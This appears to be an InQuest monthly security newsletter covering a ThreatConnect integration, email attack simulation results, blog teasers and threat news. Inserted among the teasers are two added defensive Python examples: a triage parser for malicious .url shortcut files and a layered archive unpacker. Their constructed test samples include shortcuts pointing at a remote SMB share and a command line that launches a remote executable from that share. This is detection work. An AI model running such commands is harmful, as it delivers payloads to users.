
ThreatConnect and InQuest are excited to announce the availability of a new integration between InQuest InSights Threat Intelligence and ThreatConnect’s TI Ops Platform.

InQuest’s high-fidelity threat intel is derived from our at-scale file analysis of malware and enriched with a variety of open-source and proprietary reputation sources. The integration with ThreatConnect’s TI Ops Platform makes InQuest’s indicators of compromise (IOCs) available to CTI analysts and to the SIEM, security analytics, endpoint, network, and cloud security tools they rely on, improving detection coverage while reducing false positives.

View our listing on the ThreatConnect marketplace.

Download the InQuest InSights Integration here!

InQuest Email Attack Simulation
This month we harvested 552 samples from the wild capable of bypassing either Microsoft or Google. Of those, Microsoft missed 170 (31%) and Google missed 195 (35%). InQuest MailTAC, for reference, missed only 21 (4%). The distribution of misses by file type is depicted below:
InQuest EAS includes samples sourced from 50+ industry-leading blogs. This month we sourced 33 samples from these blogs for inclusion in the attack simulation.
Want to validate the efficacy of your email security stack? InQuire here for a one-month free email attack simulation.
Labs’ IOC Lead Time
Every month we measure how far ahead of public blogs our C2 (command and control) and TI (threat intelligence) feeds publish indicators. Over the past 30 days we examined 388 indicators. Our C2 feed led public reporting on 5 of them and our Threat Intelligence and Dark Web (TIDB) feed on 33, across 17 distinct sources. For the roughly 9% of observed IOCs where we were first, the average lead time was 213 days.
InQuest Latest Blog Posts

How to Take Control of Your Data During Data Privacy Week

Posted on 2024-01-23 by Katie Brown

In today’s digital age, data privacy is more critical than ever. Started by the National Cybersecurity Alliance (NCA), Data Privacy Week continues to spread awareness about data privacy while educating individuals and organizations on how to secure personal information. This year’s theme is “Take Control of Your Data.”

Read more

Shortcut To Malice: URL Files

Posted on 2024-01-29 by Darren Spruell

Internet Shortcut files, or URL files, present an interesting opportunity to reflect on how unextraordinary file types present security risks and become an enabling technology for criminal activity when coupled with the right vulnerabilities. At InQuest, we specialize in adversaries’ abuse of complex, evasive file types for malicious ends, helping customers with solutions that are optimized to provide resilient countermeasures against cybersecurity threats.

Read more
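As an added example, not code from the blog post or from InQuest, the following triage parser reads Internet Shortcut (.url) files and flags the properties that turn a mundane shortcut into a delivery mechanism: a URL= target on a remote SMB/WebDAV share, a non-web scheme, or an IconFile= that is fetched from another host when the shortcut is rendered. Those heuristics are this example's own choices rather than InQuest's detection logic, and the three sample files are constructed inline using TEST-NET-2 addresses.

```python
from urllib.parse import urlsplit


def parse_url_file(text: str) -> dict[str, str]:
    """Parse the INI-style Internet Shortcut format.

    Only keys under [InternetShortcut] are returned, with key names lower-cased;
    section and key names are matched case-insensitively, as Windows does.
    A leading UTF-8 BOM (common in dropped samples) is tolerated.
    """
    fields: dict[str, str] = {}
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "internetshortcut" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        fields[key.strip().lower()] = value.strip()
    return fields


def _is_unc(ref: str) -> bool:
    """UNC path in either slash style (\\\\host\\share or //host/share)."""
    return ref.startswith("\\\\") or ref.startswith("//")


def _is_remote(ref: str) -> bool:
    """True for UNC paths and for URLs whose host is not the local machine."""
    if _is_unc(ref):
        return True
    parts = urlsplit(ref)
    # A bare drive path such as C:\x parses as scheme "c" with an empty netloc.
    return bool(parts.netloc) and parts.hostname not in ("localhost", "127.0.0.1")


def triage_url_file(text: str) -> list[str]:
    """Return human-readable findings for one .url file (empty list = nothing flagged)."""
    fields = parse_url_file(text)
    findings: list[str] = []
    url = fields.get("url", "")
    if not url:
        return ["missing URL= key under [InternetShortcut]"]
    scheme = "unc" if _is_unc(url) else urlsplit(url).scheme.lower()
    if scheme == "unc" or (scheme == "file" and _is_remote(url)):
        findings.append(f"URL target is a remote share (payload fetch over SMB/WebDAV): {url}")
    elif scheme not in ("http", "https"):
        # Heuristic: anything that is not plain web browsing deserves a look.
        findings.append(f"URL uses a non-web scheme '{scheme}': {url}")
    icon = fields.get("iconfile", "")
    if icon and _is_remote(icon):
        findings.append(f"IconFile is fetched from a remote host when the shortcut is rendered: {icon}")
    workdir = fields.get("workingdirectory", "")
    if workdir and _is_unc(workdir):
        findings.append(f"WorkingDirectory is a remote share: {workdir}")
    return findings


# Constructed samples (not taken from any real campaign); 198.51.100.0/24 is TEST-NET-2.
BENIGN = "[InternetShortcut]\r\nURL=https://www.example.com/\r\nIconIndex=0\r\n"
REMOTE_FILE = (
    "\ufeff[internetshortcut]\r\n"
    "URL=file://198.51.100.7/share/invoice.cmd\r\n"
    "IconFile=\\\\198.51.100.7\\share\\icon.ico\r\n"
    "IconIndex=1\r\n"
)
UNC_TARGET = "[InternetShortcut]\r\nURL=\\\\198.51.100.7\\dav\\run.lnk\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("remote_file", REMOTE_FILE), ("unc", UNC_TARGET)):
        print(name, triage_url_file(sample) or ["no findings"])
```

The parser deliberately does not use configparser: Windows matches the section name and keys case-insensitively and ignores a BOM, and a detection that only recognises a canonically cased `[InternetShortcut]` is trivially evaded.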

An Introduction to Deep File Inspection® (DFI)

Posted on 2024-01-17 by InQuest Staff

Deep File Inspection®, or DFI®, is the reassembly of packets captured off of the wire into application-level content that is then reconstructed, unraveled, and dissected (decompressed, decoded, decrypted, deobfuscated) in an automated fashion. This enables our applied analytics to better determine the intent by examining the file contents (containers, objects, etc.) as an artifact.

Read more
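To make the "unraveled" step in that definition concrete, here is an added example that is not InQuest's DFI implementation: it recursively peels common container and encoding layers (zip, gzip, base64) off a blob until it reaches leaf content, while enforcing a depth limit and a per-layer size limit so that a decompression bomb cannot exhaust the analyzer. The set of layers and the limits are this example's assumptions, and the nested sample is constructed inline.

```python
import base64
import binascii
import gzip
import io
import zipfile
import zlib

MAX_DEPTH = 8               # stop peeling nested layers past this depth
MAX_LAYER_BYTES = 4 << 20   # refuse any single decoded layer larger than 4 MiB


def _looks_like_base64(data: bytes) -> bool:
    """Strict check: whitespace-tolerant, padded, decodes cleanly, not trivially short."""
    compact = b"".join(data.split())
    if len(compact) < 16 or len(compact) % 4:
        return False
    try:
        base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def _gunzip_limited(data: bytes) -> bytes:
    """Inflate a gzip member but never emit more than MAX_LAYER_BYTES."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    out = d.decompress(data, MAX_LAYER_BYTES)
    if not d.eof:  # either truncated input or output exceeded the cap
        raise ValueError("gzip layer truncated or larger than MAX_LAYER_BYTES")
    return out


def unravel(data: bytes, path: str = "root", depth: int = 0) -> list[tuple[str, bytes]]:
    """Return (layer-path, leaf-bytes) pairs for every leaf reachable from data."""
    if depth >= MAX_DEPTH:
        return [(path + "/<depth-limit>", data)]
    if data[:4] == b"PK\x03\x04":
        leaves: list[tuple[str, bytes]] = []
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = f"{path}/zip:{info.filename}"
                # zipfile bounds the read by the declared size, so checking it first is enough.
                if info.file_size > MAX_LAYER_BYTES:
                    leaves.append((member + "/<oversize-skipped>", b""))
                    continue
                leaves.extend(unravel(zf.read(info), member, depth + 1))
        return leaves
    if data[:2] == b"\x1f\x8b":
        return unravel(_gunzip_limited(data), path + "/gzip", depth + 1)
    if _looks_like_base64(data):
        decoded = base64.b64decode(b"".join(data.split()), validate=True)
        return unravel(decoded, path + "/base64", depth + 1)
    return [(path, data)]  # leaf: hand off to content analysis


# Constructed sample: a command line wrapped in gzip, then base64, then zipped.
PAYLOAD = b"cmd.exe /c start \\\\198.51.100.7\\share\\run.exe"


def build_sample() -> bytes:
    b64 = base64.b64encode(gzip.compress(PAYLOAD))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.txt", b64)
    return buf.getvalue()


if __name__ == "__main__":
    for layer_path, leaf in unravel(build_sample()):
        print(layer_path, "->", leaf)
```

The order of the checks matters: magic-byte formats are tested before the base64 heuristic, because compressed data that happens to be valid base64 text is rare but not impossible, and a wrong guess simply yields a leaf that the next stage cannot interpret rather than a crash.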

RetroHunt®: Retrospective Analysis for Threat Hunters

Posted on 2024-01-17 by InQuest Staff

InQuest helps organizations in both threat hunting and incident response through the use of RetroHunt®, our automated retrospective analysis capability. With our RetroHunt technology, your Security Operations Center (SOC) team can uncover historical threats, validate custom detection logic, and monitor for attacks or threat actors of interest.

Read more
InQuest Labs Research Spotlight

Holehe

Holehe checks if an email is attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Read more

Living Off Trusted Sites (LOTS) Project

Attackers use popular, legitimate domains for phishing, C&C, exfiltration, and tool download in order to evade detection. This project catalogs the websites whose domains or subdomains attackers can use in this way.

Read more

excelCPU

Someone created a fully functional 16-bit, 3 Hz CPU in Excel, complete with 128 KB of RAM, a 16-color display, and a custom assembly language for writing programs to run on it.

Read more
Global Security Events

China-Linked Hackers Target Myanmar's Top Ministries with Backdoor Blitz

The China-based threat actor known as Mustang Panda is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.

Read more

DarkGate malware delivered via Microsoft Teams - detection and response

While most end users are well-acquainted with the dangers of traditional phishing attacks, such as those delivered via email or other media, a large proportion are likely unaware that Microsoft Teams chats could be a phishing vector. Most Teams activity is intra-organizational, but Microsoft enables External Access by default, which allows members of one organization to add users outside the organization to their Teams chats. Perhaps predictably, this feature has provided malicious actors a new avenue by which to exploit untrained or unaware users.

Read more

45k Jenkins servers exposed to RCE attacks using public exploits

Researchers found roughly 45,000 Jenkins instances exposed online that are vulnerable to CVE-2024-23897, a critical remote code execution (RCE) flaw for which multiple public proof-of-concept (PoC) exploits are in circulation.

Read more
InQuest Insider - Your monthly resource for the latest in cyber security news, trends, tips, and tools. Subscribe here.
Copyright © InQuest 2024